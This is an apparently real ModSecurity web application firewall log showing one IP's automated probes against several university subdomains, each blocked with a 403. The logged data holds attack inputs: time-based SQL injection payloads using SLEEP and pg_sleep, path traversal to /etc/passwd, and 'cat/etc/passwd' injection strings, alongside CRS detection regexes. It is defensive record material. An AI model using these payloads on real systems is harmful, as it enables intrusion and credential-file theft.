[Tue Aug 29 11:35:34.384688 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAASHiA8AAAAD"]
[Tue Aug 29 11:35:34.385582 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAVPX6AAAAAF"]
[Tue Aug 29 11:35:35.306416 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11l8Co-f0AAAV6LCMAAAAI"]
[Tue Aug 29 11:35:35.318026 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAASPDRwAAAAS"]
[Tue Aug 29 11:35:35.329052 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAASOUtQAAAAR"]
[Tue Aug 29 11:35:35.330088 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11l8Co-f0AAAUOaYQAAABG"]
[Tue Aug 29 11:35:35.330890 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAV6LCQAAAAI"]
[Tue Aug 29 11:35:35.342846 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAUUZ-sAAABK"]
[Tue Aug 29 11:35:35.346524 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11l8Co-f0AAAUJI2EAAABB"]
[Tue Aug 29 11:35:35.348451 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAVr@TgAAAAZ"]
[Tue Aug 29 11:35:35.351009 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAN5YJgAAAAN"]
[Tue Aug 29 11:35:35.372954 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAPY1tcAAAAh"]
[Tue Aug 29 11:35:35.379682 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAATge-IAAAAl"]
[Tue Aug 29 11:35:35.381195 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAUJI2IAAABB"]
[Tue Aug 29 11:35:35.388160 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAVoCC4AAAAY"]
[Tue Aug 29 11:35:35.400738 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAN5YJkAAAAN"]
[Tue Aug 29 11:35:36.335465 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11mMCo-f0AAAUNaqIAAABF"]
[Tue Aug 29 11:35:36.356785 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11mMCo-f0AAAT2JUwAAAAz"]
[Tue Aug 29 11:35:36.399319 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11mMCo-f0AAAUUZ-0AAABK"]
[Tue Aug 29 11:36:24.477110 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAAQSWQMAAAA0"]
[Tue Aug 29 11:36:24.506887 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAATQXmIAAAAO"]
[Tue Aug 29 11:36:24.521633 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11yMCo-f0AAAWBBPYAAAAB"]
[Tue Aug 29 11:36:24.523197 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAASEJcoAAAAE"]
[Tue Aug 29 11:36:24.615926 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAWBBPgAAAAB"]
[Tue Aug 29 11:36:24.641672 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAASHiC0AAAAD"]
[Tue Aug 29 11:36:24.669288 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11yMCo-f0AAAWBBPoAAAAB"]
[Tue Aug 29 11:36:24.684159 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAUFdg0AAAA9"]
[Tue Aug 29 11:36:24.697543 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAASHiC8AAAAD"]
[Tue Aug 29 11:36:24.702723 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAAT@KywAAAA2"]
[Tue Aug 29 11:36:24.710913 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11yMCo-f0AAAUFdg4AAAA9"]
[Tue Aug 29 11:36:24.801652 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAAUFdhEAAAA9"]
[Tue Aug 29 11:36:24.822529 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAUFdhIAAAA9"]
[Tue Aug 29 11:36:25.088154 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11ycCo-f0AAAUbg6EAAABQ"]
[Tue Aug 29 11:36:25.225165 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11ycCo-f0AAAWBBPwAAAAB"]
